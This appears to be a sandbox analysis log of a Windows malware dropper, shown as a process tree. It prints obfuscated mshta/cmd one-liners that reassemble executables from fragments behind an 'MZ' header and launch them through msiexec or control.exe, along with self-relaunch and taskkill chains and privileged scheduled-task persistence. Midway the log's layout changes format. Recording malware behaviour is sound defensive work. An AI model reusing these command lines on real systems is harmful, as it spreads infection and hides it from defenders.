C:\Users\Admin\AppData\Roaming\8224169.exe"C:\Users\Admin\AppData\Roaming\8224169.exe"5⤵PID:600
-
-
C:\Users\Admin\AppData\Roaming\8880752.exe"C:\Users\Admin\AppData\Roaming\8880752.exe"5⤵PID:3088
-
C:\Users\Admin\AppData\Roaming\2936063.exe"C:\Users\Admin\AppData\Roaming\2936063.exe"6⤵PID:6460
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIpt:clOSE (cReAteobject ("WScripT.shEll" ). rUN( "C:\Windows\system32\cmd.exe /q /c cOpY /y ""C:\Users\Admin\AppData\Roaming\2936063.exe"" JYE8HiMhEASUD_.ExE&& sTART JYE8HiMhEASUD_.exE -p8pWd0QiD~JnefCwtTsZUP &iF """" == """" for %T iN ( ""C:\Users\Admin\AppData\Roaming\2936063.exe"" ) do taskkill /im ""%~nXT"" -F ", 0 , tRuE) )7⤵PID:4580
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /c cOpY /y "C:\Users\Admin\AppData\Roaming\2936063.exe" JYE8HiMhEASUD_.ExE&& sTART JYE8HiMhEASUD_.exE -p8pWd0QiD~JnefCwtTsZUP &iF "" == "" for %T iN ( "C:\Users\Admin\AppData\Roaming\2936063.exe") do taskkill /im "%~nXT" -F8⤵PID:5380
-
C:\Users\Admin\AppData\Local\Temp\JYE8HiMhEASUD_.ExEJYE8HiMhEASUD_.exE -p8pWd0QiD~JnefCwtTsZUP9⤵PID:3612
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIpt:clOSE (cReAteobject ("WScripT.shEll" ). rUN( "C:\Windows\system32\cmd.exe /q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\JYE8HiMhEASUD_.ExE"" JYE8HiMhEASUD_.ExE&& sTART JYE8HiMhEASUD_.exE -p8pWd0QiD~JnefCwtTsZUP &iF ""-p8pWd0QiD~JnefCwtTsZUP "" == """" for %T iN ( ""C:\Users\Admin\AppData\Local\Temp\JYE8HiMhEASUD_.ExE"" ) do taskkill /im ""%~nXT"" -F ", 0 , tRuE) )10⤵PID:7128
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\JYE8HiMhEASUD_.ExE" JYE8HiMhEASUD_.ExE&& sTART JYE8HiMhEASUD_.exE -p8pWd0QiD~JnefCwtTsZUP &iF "-p8pWd0QiD~JnefCwtTsZUP " == "" for %T iN ( "C:\Users\Admin\AppData\Local\Temp\JYE8HiMhEASUD_.ExE") do taskkill /im "%~nXT" -F11⤵PID:1744
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCripT: cLose( CreATeoBjEcT ( "wScRIPt.sHelL"). rUn( "cmd.EXE /C Echo bn3iV%DAtE%Dk>42aZkEWq.S & Echo | sEt /P = ""MZ"" > FXJzTR79.MB & cOpY /Y /B FXJZTR79.MB + CN140TT2.N + 37muPO_.Y +~XE1lP0T.TrJ +X8OKE3j.P + 42AZKEWQ.s U4MN~PZU.PL & stArT msiexec /Y .\U4Mn~pZU.PL ", 0 , TRuE ) )10⤵PID:1352
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C Echo bn3iVÚtE%Dk>42aZkEWq.S & Echo | sEt /P = "MZ" > FXJzTR79.MB & cOpY /Y /B FXJZTR79.MB + CN140TT2.N+ 37muPO_.Y +~XE1lP0T.TrJ +X8OKE3j.P + 42AZKEWQ.s U4MN~PZU.PL & stArT msiexec /Y .\U4Mn~pZU.PL11⤵PID:6400
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "12⤵PID:2040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>FXJzTR79.MB"12⤵PID:4968
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec /Y .\U4Mn~pZU.PL12⤵PID:8072
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "2936063.exe" -F9⤵
- Kills process with taskkill
PID:5012
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\1093705.exe"C:\Users\Admin\AppData\Roaming\1093705.exe"6⤵PID:5528
-
-
-
C:\Users\Admin\AppData\Roaming\2175358.exe"C:\Users\Admin\AppData\Roaming\2175358.exe"5⤵PID:1320
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed1245c5fe22f.exe3⤵PID:1048
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed1245c5fe22f.exeWed1245c5fe22f.exe4⤵
- Executes dropped EXE
PID:404 -
C:\Users\Admin\Pictures\Adobe Films\HreXZuDu0r6o6JRgluhm0Z6h.exe"C:\Users\Admin\Pictures\Adobe Films\HreXZuDu0r6o6JRgluhm0Z6h.exe"5⤵PID:5940
-
C:\Users\Admin\Documents\cD0sWg5x1CnmpGv4v7SMcdIU.exe"C:\Users\Admin\Documents\cD0sWg5x1CnmpGv4v7SMcdIU.exe"6⤵PID:868
-
C:\Users\Admin\Pictures\Adobe Films\aCxRpUWhGtlHmBbip7GUJW3t.exe"C:\Users\Admin\Pictures\Adobe Films\aCxRpUWhGtlHmBbip7GUJW3t.exe"7⤵PID:7588
-
-
C:\Users\Admin\Pictures\Adobe Films\7dOONL06IODpD5Uy3mge5Kx9.exe"C:\Users\Admin\Pictures\Adobe Films\7dOONL06IODpD5Uy3mge5Kx9.exe"7⤵PID:3248
-
-
C:\Users\Admin\Pictures\Adobe Films\xwfUe0OBb_Crcgirx5gWtVbx.exe"C:\Users\Admin\Pictures\Adobe Films\xwfUe0OBb_Crcgirx5gWtVbx.exe"7⤵PID:7376
-
-
C:\Users\Admin\Pictures\Adobe Films\KbKmWssaC3nCyaZ_xymEKdDp.exe"C:\Users\Admin\Pictures\Adobe Films\KbKmWssaC3nCyaZ_xymEKdDp.exe"7⤵PID:7436
-
-
C:\Users\Admin\Pictures\Adobe Films\fAyjHDpE5PPxLz7Qf6tpQ7GE.exe"C:\Users\Admin\Pictures\Adobe Films\fAyjHDpE5PPxLz7Qf6tpQ7GE.exe"7⤵PID:2040
-
-
C:\Users\Admin\Pictures\Adobe Films\1tIAqp6kGrnP6WyxC1y0hMdy.exe"C:\Users\Admin\Pictures\Adobe Films\1tIAqp6kGrnP6WyxC1y0hMdy.exe"7⤵PID:7652
-
C:\Users\Admin\AppData\Local\Temp\is-9GMBL.tmp\1tIAqp6kGrnP6WyxC1y0hMdy.tmp"C:\Users\Admin\AppData\Local\Temp\is-9GMBL.tmp\1tIAqp6kGrnP6WyxC1y0hMdy.tmp" /SL5="$3025E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\1tIAqp6kGrnP6WyxC1y0hMdy.exe"8⤵PID:4280
-
-
-
C:\Users\Admin\Pictures\Adobe Films\su7mZpo0eTZCdgFR5a_f4GUQ.exe"C:\Users\Admin\Pictures\Adobe Films\su7mZpo0eTZCdgFR5a_f4GUQ.exe"7⤵PID:7716
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:6840
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:2860
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Lz_GN1YsrkL1bNTIgS5UzsdW.exe"C:\Users\Admin\Pictures\Adobe Films\Lz_GN1YsrkL1bNTIgS5UzsdW.exe"5⤵PID:5980
-
C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"6⤵PID:5228
-
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"6⤵PID:4160
-
-
C:\Program Files (x86)\Company\NewProduct\inst2.exe"C:\Program Files (x86)\Company\NewProduct\inst2.exe"6⤵PID:5344
-
-
-
C:\Users\Admin\Pictures\Adobe Films\2JU5nCcd4fTtlgONr5akugHK.exe"C:\Users\Admin\Pictures\Adobe Films\2JU5nCcd4fTtlgONr5akugHK.exe"5⤵PID:5972
-
-
C:\Users\Admin\Pictures\Adobe Films\m0c0czkVzDDheYw8i5Nahfmc.exe"C:\Users\Admin\Pictures\Adobe Films\m0c0czkVzDDheYw8i5Nahfmc.exe"5⤵PID:5952
-
-
C:\Users\Admin\Pictures\Adobe Films\rAEi1Qx8z9lmL00ujOqXooXO.exe"C:\Users\Admin\Pictures\Adobe Films\rAEi1Qx8z9lmL00ujOqXooXO.exe"5⤵PID:4924
-
-
C:\Users\Admin\Pictures\Adobe Films\TAvMJ51gJqZFz2NdbjysmNcy.exe"C:\Users\Admin\Pictures\Adobe Films\TAvMJ51gJqZFz2NdbjysmNcy.exe"5⤵PID:5272
-
-
C:\Users\Admin\Pictures\Adobe Films\4srw3GxZPGdctZpuJvT37GtW.exe"C:\Users\Admin\Pictures\Adobe Films\4srw3GxZPGdctZpuJvT37GtW.exe"5⤵PID:2944
-
-
C:\Users\Admin\Pictures\Adobe Films\9g2O2tOmWnk_3OwjkPJbvnLD.exe"C:\Users\Admin\Pictures\Adobe Films\9g2O2tOmWnk_3OwjkPJbvnLD.exe"5⤵PID:444
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 444 -s 4006⤵
- Program crash
PID:5936
-
-
-
C:\Users\Admin\Pictures\Adobe Films\yrjrKfuTrqIlKQTJBHxKREg0.exe"C:\Users\Admin\Pictures\Adobe Films\yrjrKfuTrqIlKQTJBHxKREg0.exe"5⤵PID:5572
-
-
C:\Users\Admin\Pictures\Adobe Films\mtTvtQQOR97SnUABTfmRZBGQ.exe"C:\Users\Admin\Pictures\Adobe Films\mtTvtQQOR97SnUABTfmRZBGQ.exe"5⤵PID:5668
-
-
C:\Users\Admin\Pictures\Adobe Films\op1whHKmaIK6kyN3LrS3n1fv.exe"C:\Users\Admin\Pictures\Adobe Films\op1whHKmaIK6kyN3LrS3n1fv.exe"5⤵PID:5580
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 4046⤵
- Program crash
PID:2884
-
-
-
C:\Users\Admin\Pictures\Adobe Films\u4TnIF9rytPw4iKg7oyXFLWM.exe"C:\Users\Admin\Pictures\Adobe Films\u4TnIF9rytPw4iKg7oyXFLWM.exe"5⤵PID:6096
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd6⤵PID:6964
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Kgq0GyFAiddduKUqEFKM9w4e.exe"C:\Users\Admin\Pictures\Adobe Films\Kgq0GyFAiddduKUqEFKM9w4e.exe"5⤵PID:5404
-
-
C:\Users\Admin\Pictures\Adobe Films\iHEFhtagofzmGlUpHbr5GPQ7.exe"C:\Users\Admin\Pictures\Adobe Films\iHEFhtagofzmGlUpHbr5GPQ7.exe"5⤵PID:4412
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping youtube.com6⤵PID:6932
-
C:\Windows\system32\PING.EXEping youtube.com7⤵
- Runs ping.exe
PID:6784
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\HUU3VcWoPH70bwEQ83qdvXXW.exe"C:\Users\Admin\Pictures\Adobe Films\HUU3VcWoPH70bwEQ83qdvXXW.exe"5⤵PID:5828
-
-
C:\Users\Admin\Pictures\Adobe Films\W7uzkbtM3RWN9zPnBjG20YBO.exe"C:\Users\Admin\Pictures\Adobe Films\W7uzkbtM3RWN9zPnBjG20YBO.exe"5⤵PID:6140
-
-
C:\Users\Admin\Pictures\Adobe Films\3zm_ZwEjLfQgsPfQDnzcXjEx.exe"C:\Users\Admin\Pictures\Adobe Films\3zm_ZwEjLfQgsPfQDnzcXjEx.exe"5⤵PID:5036
-
C:\Users\Admin\Pictures\Adobe Films\3zm_ZwEjLfQgsPfQDnzcXjEx.exe"C:\Users\Admin\Pictures\Adobe Films\3zm_ZwEjLfQgsPfQDnzcXjEx.exe"6⤵PID:6720
-
-
-
C:\Users\Admin\Pictures\Adobe Films\57ChXLtUUcEtd1QC_wBHHJNC.exe"C:\Users\Admin\Pictures\Adobe Films\57ChXLtUUcEtd1QC_wBHHJNC.exe"5⤵PID:4300
-
-
C:\Users\Admin\Pictures\Adobe Films\kiWoBwmJGG7LLDJp1o8tEumn.exe"C:\Users\Admin\Pictures\Adobe Films\kiWoBwmJGG7LLDJp1o8tEumn.exe"5⤵PID:5364
-
-
C:\Users\Admin\Pictures\Adobe Films\Z07Qs_8dukoouzEqx_62jsh5.exe"C:\Users\Admin\Pictures\Adobe Films\Z07Qs_8dukoouzEqx_62jsh5.exe"5⤵PID:5280
-
-
C:\Users\Admin\Pictures\Adobe Films\7A1LyyCX6M5DOQ8NsjN7Isg2.exe"C:\Users\Admin\Pictures\Adobe Films\7A1LyyCX6M5DOQ8NsjN7Isg2.exe"5⤵PID:3652
-
-
C:\Users\Admin\Pictures\Adobe Films\h_IhvbniuMIgg0yCSzbRB0zf.exe"C:\Users\Admin\Pictures\Adobe Films\h_IhvbniuMIgg0yCSzbRB0zf.exe"5⤵PID:3012
-
C:\Users\Admin\AppData\Roaming\7544316.exe"C:\Users\Admin\AppData\Roaming\7544316.exe"6⤵PID:5128
-
-
C:\Users\Admin\AppData\Roaming\2907082.exe"C:\Users\Admin\AppData\Roaming\2907082.exe"6⤵PID:1328
-
-
C:\Users\Admin\AppData\Roaming\3505703.exe"C:\Users\Admin\AppData\Roaming\3505703.exe"6⤵PID:1324
-
-
C:\Users\Admin\AppData\Roaming\564514.exe"C:\Users\Admin\AppData\Roaming\564514.exe"6⤵PID:3756
-
-
C:\Users\Admin\AppData\Roaming\251065.exe"C:\Users\Admin\AppData\Roaming\251065.exe"6⤵PID:4988
-
C:\Users\Admin\AppData\Roaming\4958929.exe"C:\Users\Admin\AppData\Roaming\4958929.exe"7⤵PID:2904
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIpt:clOSE (cReAteobject ("WScripT.shEll" ). rUN( "C:\Windows\system32\cmd.exe /q /c cOpY /y ""C:\Users\Admin\AppData\Roaming\4958929.exe"" JYE8HiMhEASUD_.ExE&& sTART JYE8HiMhEASUD_.exE -p8pWd0QiD~JnefCwtTsZUP &iF """" == """" for %T iN ( ""C:\Users\Admin\AppData\Roaming\4958929.exe"" ) do taskkill /im ""%~nXT"" -F ", 0 , tRuE) )8⤵PID:3052
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /c cOpY /y "C:\Users\Admin\AppData\Roaming\4958929.exe" JYE8HiMhEASUD_.ExE&& sTART JYE8HiMhEASUD_.exE -p8pWd0QiD~JnefCwtTsZUP &iF "" == "" for %T iN ( "C:\Users\Admin\AppData\Roaming\4958929.exe") do taskkill /im "%~nXT" -F9⤵PID:6912
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:2240
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "4958929.exe" -F10⤵
- Kills process with taskkill
PID:7628
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\106656.exe"C:\Users\Admin\AppData\Roaming\106656.exe"7⤵PID:5016
-
-
-
C:\Users\Admin\AppData\Roaming\6485933.exe"C:\Users\Admin\AppData\Roaming\6485933.exe"6⤵PID:5812
-
-
-
C:\Users\Admin\Pictures\Adobe Films\AwTxlmCABrJz7EAdimlbFcu2.exe"C:\Users\Admin\Pictures\Adobe Films\AwTxlmCABrJz7EAdimlbFcu2.exe"5⤵
- Executes dropped EXE
PID:520
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12bf97133ddde4842.exe3⤵PID:1196
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12bf97133ddde4842.exeWed12bf97133ddde4842.exe4⤵PID:2240
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12e5a6a551c39b62a.exe3⤵PID:348
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12e5a6a551c39b62a.exeWed12e5a6a551c39b62a.exe4⤵
- Executes dropped EXE
PID:1600 -
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12e5a6a551c39b62a.exeC:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12e5a6a551c39b62a.exe5⤵PID:592
-
-
-
-
C:\Windows\SysWOW64\cmd.exe (depth 3, PID 3160)
  Command line: C:\Windows\system32\cmd.exe /c Wed12581881318b9e75.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12581881318b9e75.exe (depth 4, PID 3492)
  Command line: Wed12581881318b9e75.exe
  - Executes dropped EXE

C:\Windows\SysWOW64\mshta.exe (depth 5, PID 5080)
  Command line: "C:\Windows\System32\mshta.exe" vBSCRIPt: cLoSE(CreAteOBJEcT( "WScRIpt.SHelL" ).rUN ("C:\Windows\system32\cmd.exe /C tYpE ""C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12581881318b9e75.exe"" >7xQFL7QGisA~.exE && stArT 7xQfL7QGiSA~.ExE /pAA1Exp5mOw9JMS & iF """" == """" for %C IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12581881318b9e75.exe"" ) do taskkill -iM ""%~NxC"" /F" ,0 , tRue ) )

C:\Users\Admin\AppData\Local\Temp\is-G17RA.tmp\Wed124bd92a370.tmp (depth 1, PID 4616)
  Command line: "C:\Users\Admin\AppData\Local\Temp\is-G17RA.tmp\Wed124bd92a370.tmp" /SL5="$60048,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed124bd92a370.exe"

C:\Windows\SysWOW64\cmd.exe (depth 1, PID 1748)
  Command line: "C:\Windows\system32\cmd.exe" /C tYpE "C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12581881318b9e75.exe" >7xQFL7QGisA~.exE && stArT 7xQfL7QGiSA~.ExE /pAA1Exp5mOw9JMS & iF "" =="" for %C IN ( "C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12581881318b9e75.exe" ) do taskkill -iM "%~NxC" /F

C:\Users\Admin\AppData\Local\Temp\7xQFL7QGisA~.exE (depth 2, PID 3136)
  Command line: 7xQfL7QGiSA~.ExE /pAA1Exp5mOw9JMS

C:\Windows\SysWOW64\mshta.exe (depth 3, PID 5020)
  Command line: "C:\Windows\System32\mshta.exe" vBSCRIPt: cLoSE(CreAteOBJEcT( "WScRIpt.SHelL" ).rUN ("C:\Windows\system32\cmd.exe /C tYpE ""C:\Users\Admin\AppData\Local\Temp\7xQFL7QGisA~.exE"" >7xQFL7QGisA~.exE && stArT 7xQfL7QGiSA~.ExE /pAA1Exp5mOw9JMS & iF ""/pAA1Exp5mOw9JMS "" == """" for %C IN ( ""C:\Users\Admin\AppData\Local\Temp\7xQFL7QGisA~.exE"" ) do taskkill -iM ""%~NxC"" /F" ,0 , tRue ) )

C:\Windows\SysWOW64\cmd.exe (depth 4, PID 444)
  Command line: "C:\Windows\system32\cmd.exe" /C tYpE "C:\Users\Admin\AppData\Local\Temp\7xQFL7QGisA~.exE" >7xQFL7QGisA~.exE && stArT 7xQfL7QGiSA~.ExE /pAA1Exp5mOw9JMS & iF "/pAA1Exp5mOw9JMS " =="" for %C IN ( "C:\Users\Admin\AppData\Local\Temp\7xQFL7QGisA~.exE" ) do taskkill -iM "%~NxC" /F

C:\Windows\SysWOW64\mshta.exe (depth 3, PID 1440)
  Command line: "C:\Windows\System32\mshta.exe" VbsCRipT: ClOSE ( creAteOBJeCT ( "WSCRiPT.ShEll" ).RuN ( "C:\Windows\system32\cmd.exe /Q /R EcHo | SEt /p = ""MZ"" > 88RS.Le2& copy /y /b 88RS.Le2 + 5X8zA.G26 +~uK~V0.Rcv + FXLXz.ZXS + hrO~~rUD.m + A1T1O.TS + EQnYZisO.LU NBOX.D&sTARt control.exe .\NBOX.D " , 0, tRue) )

C:\Windows\SysWOW64\taskkill.exe (depth 2, PID 1200)
  Command line: taskkill -iM "Wed12581881318b9e75.exe" /F
  - Kills process with taskkill

C:\Windows\system32\WerFault.exe (depth 1, PID 4572)
  Command line: C:\Windows\system32\WerFault.exe -u -p 3168 -s 1488
  - Program crash

C:\Windows\SysWOW64\cmd.exe (depth 1, PID 5348)
  Command line: "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"

C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe (depth 2, PID 4904)
  Command line: ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi

C:\Windows\SysWOW64\mshta.exe (depth 3, PID 5832)
  Command line: "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )

C:\Windows\SysWOW64\cmd.exe (depth 4, PID 6204)
  Command line: "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"

C:\Windows\SysWOW64\mshta.exe (depth 3, PID 4260)
  Command line: "C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )

C:\Windows\SysWOW64\cmd.exe (depth 4, PID 2956)
  Command line: "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC

C:\Windows\SysWOW64\cmd.exe (depth 5, PID 6024)
  Command line: C:\Windows\system32\cmd.exe /S /D /c" EcHo "

C:\Windows\SysWOW64\cmd.exe (depth 5, PID 5536)
  Command line: C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"

C:\Windows\SysWOW64\msiexec.exe (depth 5, PID 7516)
  Command line: msiexec -Y ..\lXQ2g.WC

C:\Windows\SysWOW64\taskkill.exe (depth 2, PID 6680)
  Command line: taskkill -f -iM "search_hyperfs_206.exe"
  - Kills process with taskkill

C:\Users\Admin\AppData\Roaming\6333206.exe (depth 1, PID 5204)
  Command line: "C:\Users\Admin\AppData\Roaming\6333206.exe"

C:\Users\Admin\AppData\Roaming\138082.exe (depth 1, PID 2876)
  Command line: "C:\Users\Admin\AppData\Roaming\138082.exe"

C:\Users\Admin\AppData\Roaming\2256751.exe (depth 1, PID 3704)
  Command line: "C:\Users\Admin\AppData\Roaming\2256751.exe"

C:\Windows\SysWOW64\cmd.exe (depth 1, PID 5556)
  Command line: "C:\Windows\system32\cmd.exe" /Q /R EcHo | SEt /p = "MZ" >88RS.Le2& copy /y /b 88RS.Le2+ 5X8zA.G26+~uK~V0.Rcv+ FXLXz.ZXS + hrO~~rUD.m + A1T1O.TS+ EQnYZisO.LU NBOX.D&sTARt control.exe .\NBOX.D

C:\Windows\SysWOW64\cmd.exe (depth 2, PID 7148)
  Command line: C:\Windows\system32\cmd.exe /S /D /c" EcHo "

C:\Windows\SysWOW64\cmd.exe (depth 2, PID 6256)
  Command line: C:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>88RS.Le2"

C:\Windows\SysWOW64\control.exe (depth 2, PID 7004)
  Command line: control.exe .\NBOX.D

C:\Windows\SysWOW64\rundll32.exe (depth 3, PID 7148)
  Command line: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\NBOX.D

C:\Windows\system32\RunDll32.exe (depth 4, PID 4208)
  Command line: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\NBOX.D

C:\Windows\SysWOW64\rundll32.exe (depth 5, PID 6588)
  Command line: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\NBOX.D

C:\Users\Admin\AppData\Roaming\4266949.exe (depth 1, PID 6344)
  Command line: "C:\Users\Admin\AppData\Roaming\4266949.exe"

C:\Users\Admin\AppData\Roaming\8809580.exe (depth 2, PID 3628)
  Command line: "C:\Users\Admin\AppData\Roaming\8809580.exe"

C:\Windows\SysWOW64\mshta.exe (depth 3, PID 6644)
  Command line: "C:\Windows\System32\mshta.exe" vBSCrIpt:clOSE (cReAteobject ("WScripT.shEll" ). rUN( "C:\Windows\system32\cmd.exe /q /c cOpY /y ""C:\Users\Admin\AppData\Roaming\8809580.exe"" JYE8HiMhEASUD_.ExE&& sTART JYE8HiMhEASUD_.exE -p8pWd0QiD~JnefCwtTsZUP &iF """" == """" for %T iN ( ""C:\Users\Admin\AppData\Roaming\8809580.exe"" ) do taskkill /im ""%~nXT"" -F ", 0 , tRuE) )

C:\Windows\SysWOW64\cmd.exe (depth 4, PID 5160)
  Command line: "C:\Windows\system32\cmd.exe" /q /c cOpY /y "C:\Users\Admin\AppData\Roaming\8809580.exe" JYE8HiMhEASUD_.ExE&& sTART JYE8HiMhEASUD_.exE -p8pWd0QiD~JnefCwtTsZUP &iF "" == "" for %T iN ( "C:\Users\Admin\AppData\Roaming\8809580.exe") do taskkill /im "%~nXT" -F

C:\Windows\SysWOW64\taskkill.exe (depth 5, PID 5820)
  Command line: taskkill /im "8809580.exe" -F
  - Kills process with taskkill

C:\Users\Admin\AppData\Roaming\5996487.exe (depth 2, PID 5996)
  Command line: "C:\Users\Admin\AppData\Roaming\5996487.exe"

C:\Users\Admin\AppData\Roaming\6492186.exe (depth 1, PID 6368)
  Command line: "C:\Users\Admin\AppData\Roaming\6492186.exe"

C:\Users\Admin\AppData\Roaming\2325477.exe (depth 1, PID 6324)
  Command line: "C:\Users\Admin\AppData\Roaming\2325477.exe"

C:\Users\Admin\AppData\Roaming\1882029.exe (depth 1, PID 2300)
  Command line: "C:\Users\Admin\AppData\Roaming\1882029.exe"

C:\Windows\system32\wbem\wmiprvse.exe (depth 1, PID 1688)
  Command line: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\rundll32.exe (depth 2, PID 6448)
  Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process

C:\Windows\SysWOW64\rundll32.exe (depth 3, PID 6528)
  Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\system32\svchost.exe (depth 1, PID 6724)
  Command line: C:\Windows\system32\svchost.exe -k SystemNetworkService